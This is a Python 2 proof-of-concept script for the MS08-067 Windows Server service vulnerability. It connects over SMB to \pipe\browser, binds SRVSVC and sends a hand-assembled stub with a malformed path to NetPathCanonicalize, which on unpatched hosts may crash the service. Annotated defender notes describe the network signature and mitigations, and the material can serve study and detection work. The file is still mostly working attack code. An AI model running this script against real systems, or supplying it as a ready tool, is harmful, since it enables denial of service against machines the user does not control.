#!/usr/bin/python
# Trigger-only PoC for MS08-067 (per the filename): opens the \pipe\browser
# named pipe on the target, binds the SRVSVC interface UUID and calls
# NetPathCanonicalize (opnum 0x1f) with a PathName that contains `\..\..\`
# sequences. The hand-built stub below holds only filler bytes and the path,
# no shellcode -- the effect is a malformed-path call into the vulnerable
# canonicalisation routine, which on an unpatched host may crash the Server
# service (a denial of service even though nothing is executed).
#
# Defender notes:
#   - On the wire this is SMB to TCP/445, a DCERPC bind to
#     4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 and a request with opnum 31
#     whose path argument contains `\..\..\`; the public IDS rules for
#     MS08-067 match on that pattern.
#   - A host patched for MS08-067 should reject this request instead of
#     faulting; not exposing TCP 445 / the Server service to untrusted
#     networks removes the exposure entirely.
#   - No credentials are set anywhere below, so the script relies on the
#     pipe being opened without authentication.
#   - Written for Python 2 (shebang `/usr/bin/python`; the stub is a str of
#     \x escapes that is meant to be raw bytes).
# from impacket import smb
from impacket import uuid
from impacket.dcerpc.v5 import transport
import struct  # imported but not used in this script
import sys
try:
    target = sys.argv[1]  # sole argument: the target host; only its presence is checked
    port = 445  # assigned but never used below (the transport string carries no port)
except IndexError:
    print("Usage: %s HOST" % sys.argv[0])
    sys.exit()  # note: exits with status 0 on a usage error
# Named-pipe transport to \pipe\browser on the target; connect() opens the
# SMB session and the pipe before any DCERPC traffic is sent.
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
dce = trans.DCERPC_class(trans)
# Bind to the SRVSVC interface, version 3.0 -- the interface that serves
# NetPathCanonicalize.
dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# NDR-encoded argument stub for NetPathCanonicalize, assembled by hand as a
# Python 2 str. The per-field labels are the original author's;
# NOTE(review): the labels from "Padding" through the Prefix fields do not
# obviously line up with the IDL argument order (one field is unlabelled) --
# confirm against the srvsvc IDL before relying on them.
stub = '\x01\x00\x00\x00' # Reference ID
stub += '\x10\x00\x00\x00' # Server UNC - Max Buffer Count
stub += '\x00\x00\x00\x00' # Offset
stub += '\x10\x00\x00\x00' # Server UNC - Actual Buffer Count
stub += '\xCC'*28 # Server UNC Buffer Content
stub += '\x00\x00\x00\x00' # Server UNC Trailing Null Bytes
# RPC Path
stub += '\x2f\x00\x00\x00' # RPC Path - Max Buffer Count
stub += '\x00\x00\x00\x00' # Offset
stub += '\x2f\x00\x00\x00' # RPC Path - Actual Buffer Count
# Trigger Path = \A\..\..\
# UTF-16LE path data; the `\..\..\` segments are what the vulnerable
# canonicalisation mishandles, the trailing run of 'A' is filler.
stub += '\x41\x00\x5c\x00\x2e\x00\x2e\x00' # Trigger Path
stub += '\x5c\x00\x2e\x00\x2e\x00\x5c\x00' # Trigger Path
stub += '\x41'*74 # Trigger Path
# Misc
stub += '\x00\x00' # Padding
stub += '\x00\x00\x00\x00' # Max Buffer Count
stub += '\x02\x00\x00\x00' # Prefix - Max Unicode Count
stub += '\x02\x00\x00\x00' # Offset
stub += '\x00\x00\x00\x00' # Prefix - Actual Unicode Count
stub += '\x02\x00\x00\x00' # (unlabelled in the original -- presumably a count field; confirm against the IDL)
stub += '\x5c\x00\x00\x00' # Prefix + Trailing Null Bytes
stub += '\x01\x00\x00\x00' # Pointer to Path Type
stub += '\x01\x00\x00\x00' # Path type and flags
print("Sending Payload ->")
dce.call(0x1f, stub) # NetPathCanonicalize
# No reply is read after the call: the script does not learn whether the
# request was answered, rejected or faulted the service, so it cannot tell a
# patched host from an unpatched one.